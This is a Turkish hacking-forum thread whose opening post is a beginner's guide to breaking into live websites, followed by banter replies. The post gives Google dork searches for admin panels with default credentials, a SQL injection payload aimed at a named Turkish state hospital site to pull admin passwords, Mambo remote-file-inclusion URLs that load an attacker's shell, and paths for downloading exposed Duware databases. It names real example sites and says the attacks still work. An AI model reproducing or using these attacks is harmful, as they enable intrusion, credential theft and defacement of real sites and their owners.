Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Yaşasın Site Hacklemek! [Yeni Başlayanlar İçin]
Yaşasın Site Hacklemek! [Yeni Başlayanlar İçin]
-
Arkadaslar eminim ki aranızda site hacklemek isteyip hackleyemeyenler vardır. Bu konuda hepiniz site hackliceksiniz :) Lamer olmadan scriptkiddie, scriptkiddie olmadan da hacker olamazsınız :) Bi yerden öğrenmek lazım. Başlıyoruz...
Arkada$Lar Cok KoLay Bir Yontem...
ilk oLarak Google.com'a Giriyoruz !! Daha Sonra Arama Metnine
inurl:admin intext:username:admin intext:password:admin
Zaten sayfada yazıyo amk.
User: admin
Pass: admin
Login oLun.. PaneL eLinizde... Örnekler:
www.xponse.com/mortgage_demo/admin/adminlogin.asphttp://www.codejay.com/samples/books/admin/default.asp
Aranacak kod: "yazdir.asp?haber_id=" Bulduğunuz sayfada = deki sayıyı silin bunu ekleyin 1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin dha sonra sol üst köşede admin login bilgileri karşınızda...
Örnek:
http://www.ispartadh.gov.tr/yazdir.asp?haber_id=1%20union%20select%200,admin,sifre,0,0,0,0,0,0%20,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin (eheueheu özellikle tıklayın amk)
"admin/giris.asp" Değiştirilmemişse giriş yapacağınız alan ki genelde değiştirilmiş olabiliyo :D
powered by mambo 4.5.2 yazarak google'De arıyorsunuz
http://[path]/index.php?mosConfig_absolute_path=http://shell'iniz
http://[path]/administrator/popups/contentwindow.php?mosConfig_absolute_path=http://shell'iniz
http://[path]/administrator/popups/pollwindow.php?mosConfig_absolute_path=http://shell'iniz
http://[path]/includes/Archive/Tar.php?mosConfig_absolute_path=http://shell'inizÖrnek:
Duware en eski script yazıcılarındandır bu alemin. Hatta su an siteleri bile calismiyo parkingde. Baya bi websitesi urunlaerini kullanıyo. Databaseleri ../_private/DUpaypal.mdb ../_private/DUpoll.mdb ../_private/DUcalendar.mdb vb. genellikle değiştirilmemiş oluyo. ve injectionda gecirebiliyolar genellikle ...Şimdi 1-2 örnek görelim :)
DuportaL acığı
GoogLe Araması :
PHP Kodu:
"powered by ducalendar"EkLenecek Kod
PHP Kodu:
_private/ducalendar.mdbGoogLe Araması :
PHP Kodu:
"Powered by Duclassified"PHP Kodu:
_private/duclassified.mdbGoogLe Araması :
PHP Kodu:
"powered by duclassmate"PHP Kodu:
_private/duclassmate.mdbGoogLe Araması :
PHP Kodu:
"Powered by Dudirectory"PHP Kodu:
_private/dudirectory.mdbGoogLe Araması :
PHP Kodu:
"powered by dudownload"PHP Kodu:
_private/dudownload.mdbGoogLe Araması :
PHP Kodu:
"powered by duportal"PHP Kodu:
_private/duportal.mdbhttp://www.kaportaci.net/DUpics/_private/dupics.mdb bunun gibi duware urunu yuzlerce site var arayin bulun hackleyin :)
Not: Açıldığıan itibariyle örnek sitelerin hepsi çalışmaktadır :D Yazan ben :)
-
powered by ducalendar yaz bakalim turkce sayfalarda arattir kac tane google ile yapilan hack sayfasi cikacak... bide utanmadan ben yazdim demissin.
-
Metni bütün olarak ben yazdım ordaki hiç bi açığı ben bulmadım sadece toplayıp yazdım. ha amk bunu anlayamamışsan hiç yazma sen... duware herhangi bi scriptini indir mdb yolunu bul. googlede site ara sonra sende yaz bunu yapabilirsin sanırım! Ordaki örnek siteleri ve linkler hariç metni ben yazdım anladın mı?
-
ohoo 1 yıl önce görmüştüm bunu
-
Yeni başlayanlar için "hala çalışan" örnekler bi sene önce görenler ve görmeyenler için hala işe yarayabilir di mi canım arkadaşım :)
-
:)))
la kullanma kılavuzu olan hackingi ben napim.Herkes hack yapacaksa ben niye yapim.Bir çelişki sezdim :D
-
Yapmayın amk yardım edende kabahat :D 3te 3 süper bi performans !! La adamlara al hackle öğren diyon bizene diolar yok size bundan soora hek mek amk:D:D
-
bLuetuLips bunu yazdı:
-----------------------------Yapmayın amk yardım edende kabahat :D 3te 3 süper bi performans !! La adamlara al hackle öğren diyon bizene diolar yok size bundan soora hek mek amk:D:D
-----------------------------celallenme yiğidim,hack'e başlayanlar için demişsin de böyle başlayanlar da maymun iştahına kurban oluyor.Bir yerde kesiliyor ki kendimden biliyorum :)
-
bu gibi konularda Dogru yu öğrenmek için en yanlıstan baslayacan.......
öle düşünürsen dogru harika muhteşem bişe...
-
Hackera Bahhh Yaw ((((: Kop Kop
-
kuytul bunu yazdı:
-----------------------------celallenme yiğidim,hack'e başlayanlar için demişsin de böyle başlayanlar da maymun iştahına kurban oluyor.Bir yerde kesiliyor ki kendimden biliyorum :)
-----------------------------
hocam burası sonucta hack sitesi 3 tane sinir bozucu cvp benim için belli bi mesajdan sonra böle yan etkiler oluo napim :) Aslinda hack eğlenceli bişe site yapan içinde siteleri bozanlar içinde :) bi gun rfi acklari ariyodum bi sitedegirdigim her phpde youre an idiot lalaylaylar gibi sarkilarla karsiliyodular alttada eglenceli kısmından bi parca:)) yanlış şeyler deniyorsunuz.. ayıp olmuyor demi ama :)) ? Editör : 0 Sparta Devlet Hastanesi :D:D